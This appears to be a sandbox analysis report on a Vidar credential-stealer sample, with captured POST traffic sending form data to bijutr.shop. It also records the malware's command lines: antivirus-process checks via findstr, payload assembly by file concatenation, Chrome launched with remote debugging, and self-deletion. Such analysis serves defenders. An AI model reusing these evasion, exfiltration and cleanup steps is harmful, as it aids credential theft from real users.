2024-12-27 06:10:35 UTC | 11445 | OUT | Data Ascii: ------3WB1NY58Q9RIMYCT00ZUContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------3WB1NY58Q9RIMYCT00ZUContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------3WB1NY58Q9RIMYCT00ZUCont
2024-12-27 06:10:36 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49865 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:37 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9ZMY5PP8Q9RIM79H47YU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 14153
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:37 UTC | 14153 | OUT | Data Ascii: ------9ZMY5PP8Q9RIM79H47YUContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------9ZMY5PP8Q9RIM79H47YUContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------9ZMY5PP8Q9RIM79H47YUCont
2024-12-27 06:10:38 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:38 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49866 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:38 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9ZMY5PP8Q9RIM79H47YU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 4277
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:38 UTC | 4277 | OUT | Data Ascii: ------9ZMY5PP8Q9RIM79H47YUContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------9ZMY5PP8Q9RIM79H47YUContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------9ZMY5PP8Q9RIM79H47YUCont
2024-12-27 06:10:39 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:39 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49872 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:40 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9ZMGDJMO89RQQIMO8QI5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 6249
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:40 UTC | 6249 | OUT | Data Ascii: ------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------9ZMGDJMO89RQQIMO8QI5Cont
2024-12-27 06:10:41 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49877 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:41 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9ZMGDJMO89RQQIMO8QI5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 4573
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:41 UTC | 4573 | OUT | Data Ascii: ------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------9ZMGDJMO89RQQIMO8QI5Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49882 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:43 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PP8Y5FC2NGV3EUS26P89
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 1977
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:43 UTC | 1977 | OUT | Data Ascii:
------PP8Y5FC2NGV3EUS26P89
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------PP8Y5FC2NGV3EUS26P89
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------PP8Y5FC2NGV3EUS26P89
Cont
2024-12-27 06:10:44 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:44 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49885 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:44 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PP8Y5FC2NGV3EUS26P89
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 3161
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:44 UTC | 3161 | OUT | Data Ascii:
------PP8Y5FC2NGV3EUS26P89
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------PP8Y5FC2NGV3EUS26P89
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------PP8Y5FC2NGV3EUS26P89
Cont
2024-12-27 06:10:45 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:45 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49891 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:46 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7YU3OPPZC2VAIM790RI5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 1697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:46 UTC | 1697 | OUT | Data Ascii:
------7YU3OPPZC2VAIM790RI5
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------7YU3OPPZC2VAIM790RI5
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------7YU3OPPZC2VAIM790RI5
Cont
2024-12-27 06:10:47 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:47 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49892 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:47 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DJMOZCB16P8YUAAS00Z5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 1929
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:47 UTC | 1929 | OUT | Data Ascii:
------DJMOZCB16P8YUAAS00Z5
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------DJMOZCB16P8YUAAS00Z5
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------DJMOZCB16P8YUAAS00Z5
Cont
2024-12-27 06:10:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:49 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49898 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:50 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----QQI5XLXT00ZUAAASR90R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:50 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 35 58 4c 58 54 30 30 5a 55 41 41 41 53 52 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 35 58 4c 58 54 30 30 5a 55 41 41 41 53 52 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 35 58 4c 58 54 30 30 5a 55 41 41 41 53 52 39 30 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------QQI5XLXT00ZUAAASR90RContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------QQI5XLXT00ZUAAASR90RContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------QQI5XLXT00ZUAAASR90RCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:50 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49909 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:53 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBA1DBSRQQ9ZUASRIWLF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:53 UTC | 331 | OUT | Data Ascii: ------DBA1DBSRQQ9ZUASRIWLFContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------DBA1DBSRQQ9ZUASRIWLFContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------DBA1DBSRQQ9ZUASRIWLFCont
2024-12-27 06:10:54 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49915 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:55 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----79HDJ5FK6F37QQIECBS0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:55 UTC | 331 | OUT | Data Ascii: ------79HDJ5FK6F37QQIECBS0Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------79HDJ5FK6F37QQIECBS0Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------79HDJ5FK6F37QQIECBS0Cont
2024-12-27 06:10:56 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:01:09:05
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\yoda.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:853'528 bytes
                                                                                                                                                                                                                                                              MD5 hash:79884836C406AE143BC31AEADFA81E70
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                              Start time:01:09:06
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                              Start time:01:09:06
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

Target ID:3
Start time:01:09:08
Start date:27/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x6c0000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:01:09:08
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0x6c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:01:09:08
Start date:27/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x6c0000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:01:09:08
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x6c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:01:09:09
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 314782
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:01:09:09
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "INSPIRED" Interview
Imagebase:0x6c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:01:09:09
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:01:09:09
Start date:27/12/2024
Path:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Wow64 process (32bit):true
Commandline:Iceland.com A
Imagebase:0xa20000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2869693488.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2871233735.0000000003A4D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                              Start time:01:09:09
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                              Imagebase:0x900000
                                                                                                                                                                                                                                                              File size:28'160 bytes
                                                                                                                                                                                                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                              Start time:01:09:41
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                              Start time:01:09:42
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2176,i,7491124011227582456,6124971309095306324,262144 /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                              Start time:01:10:56
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\314782\Iceland.com" & rd /s /q "C:\ProgramData\4EK6XL68GLNY" & exit
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                              Start time:01:10:56
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                              Start time:01:10:56
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:timeout /t 10
                                                                                                                                                                                                                                                              Imagebase:0x120000
